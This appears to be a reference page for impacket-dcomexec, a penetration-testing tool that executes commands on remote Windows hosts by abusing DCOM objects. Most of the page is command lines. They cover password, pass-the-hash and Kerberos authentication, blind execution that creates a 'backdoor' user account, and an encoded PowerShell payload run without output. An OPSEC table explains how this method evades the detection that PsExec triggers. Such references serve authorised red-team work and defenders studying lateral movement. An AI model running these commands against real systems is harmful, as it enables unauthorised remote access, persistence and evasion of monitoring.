Skip to main content

Overview

impacket-dcomexec executes commands on a remote Windows host by abusing legitimate DCOM (Distributed Component Object Model) objects. It provides a semi-interactive shell without creating services or scheduled tasks. Three DCOM objects are supported, each with different execution characteristics and detection profiles.

Authentication

MethodFlagExample
Passworddomain/user:passwordCORP/admin:Password1
NTLM hash-hashes-hashes :aad3b435b51404eeaad3b435b51404ee
Kerberos-k -no-pass-k -no-pass -dc-ip 10.10.10.1

Basic Usage

Interactive semi-shell (default object is MMC20.Application): 
impacket-dcomexec CORP/admin:[email protected]
Execute a single command: 
impacket-dcomexec CORP/admin:[email protected] "whoami"
Without interactive shell (command only): 
impacket-dcomexec -nooutput CORP/admin:[email protected] "net user backdoor Pass123 /add"

Available DCOM Objects

MMC20.Application (default)

impacket-dcomexec -object MMC20.Application CORP/admin:[email protected]
Uses MMC20.Application COM object and calls Document.ActiveView.ExecuteShellCommand(). Process spawns under mmc.exe.

ShellWindows

impacket-dcomexec -object ShellWindows CORP/admin:[email protected]
Uses ShellWindows COM object (Shell.Explorer). Leverages an existing explorer.exe instance. Process spawns under explorer.exe.

ShellBrowserWindow

impacket-dcomexec -object ShellBrowserWindow CORP/admin:[email protected]
Similar to ShellWindows but uses a different COM class. Process spawns under explorer.exe.

Specify Object with -object

ObjectCLSIDParent Process
MMC20.Application49B2791A-B1AE-4C90-9B8E-E860BA07F889mmc.exe
ShellWindows9BA05972-F6A8-11CF-A442-00A0C90A8F39explorer.exe
ShellBrowserWindowC08AFD90-F2A1-11D1-8455-00A0C91F3880explorer.exe
# Try ShellWindows if MMC20 is blocked
impacket-dcomexec -object ShellWindows CORP/admin:[email protected] "whoami"

How It Works

  1. Authenticates to the target via RPC (port 135)
  2. Requests instantiation of the specified DCOM object
  3. The DCOM runtime negotiates a dynamic high port (49152+) for the object
  4. Calls a method on the object to execute cmd.exe /C <command>
  5. Output is redirected to a temp file and read back over SMB (port 445)
  6. Temp file is deleted after reading
Requires ports 135 (RPC) and 445 (SMB) plus dynamic high ports (49152-65535).

OPSEC

ArtifactDetails
No service createdUnlike PsExec, no service is installed
No scheduled taskUnlike atexec, no task is registered
Process parentDepends on DCOM object used (mmc.exe or explorer.exe)
NetworkRPC on 135 + dynamic high ports + SMB 445
Temp fileOutput written to C:\Windows\Temp\<random>.tmp
Event 4688Process creation shows parent as mmc.exe/explorer.exe
DCOM execution is harder to detect than PsExec/smbexec because it uses legitimate COM objects. The unusual parent-child process relationship (e.g., mmc.exe spawning cmd.exe) is the primary detection vector.

Pass-the-Hash

impacket-dcomexec -hashes :aad3b435b51404eeaad3b435b51404ee [email protected]
With specific object: 
impacket-dcomexec -hashes :aad3b435b51404eeaad3b435b51404ee -object ShellWindows [email protected]

Kerberos Authentication

export KRB5CCNAME=/tmp/admin.ccache
impacket-dcomexec -k -no-pass CORP/[email protected]
With explicit DC IP: 
impacket-dcomexec -k -no-pass -dc-ip 10.10.10.1 CORP/[email protected]
Target must be specified by hostname (FQDN) when using Kerberos, not by IP.

Quick Reference

# Interactive shell (default MMC20)
impacket-dcomexec CORP/admin:[email protected]

# Single command
impacket-dcomexec CORP/admin:[email protected] "whoami"

# Use ShellWindows object
impacket-dcomexec -object ShellWindows CORP/admin:[email protected]

# Use ShellBrowserWindow object
impacket-dcomexec -object ShellBrowserWindow CORP/admin:[email protected]

# Pass-the-hash
impacket-dcomexec -hashes :NT_HASH [email protected]

# Kerberos
export KRB5CCNAME=/tmp/admin.ccache
impacket-dcomexec -k -no-pass CORP/[email protected]

# No output (blind execution)
impacket-dcomexec -nooutput CORP/admin:[email protected] "net user backdoor Pass123 /add"

# Silently execute (fire and forget)
impacket-dcomexec -silentcommand CORP/admin:[email protected] "powershell -e JABjAGwA..."
FlagDescription
-objectDCOM object to use (MMC20.Application, ShellWindows, ShellBrowserWindow)
-hashesNTLM hash for pass-the-hash (LM:NT or :NT)
-kUse Kerberos authentication
-no-passNo password prompt (use with -k)
-dc-ipDomain Controller IP for Kerberos
-nooutputDo not retrieve command output
-silentcommandDo not retrieve output and do not open a shell
-codecOutput encoding (default: utf-8)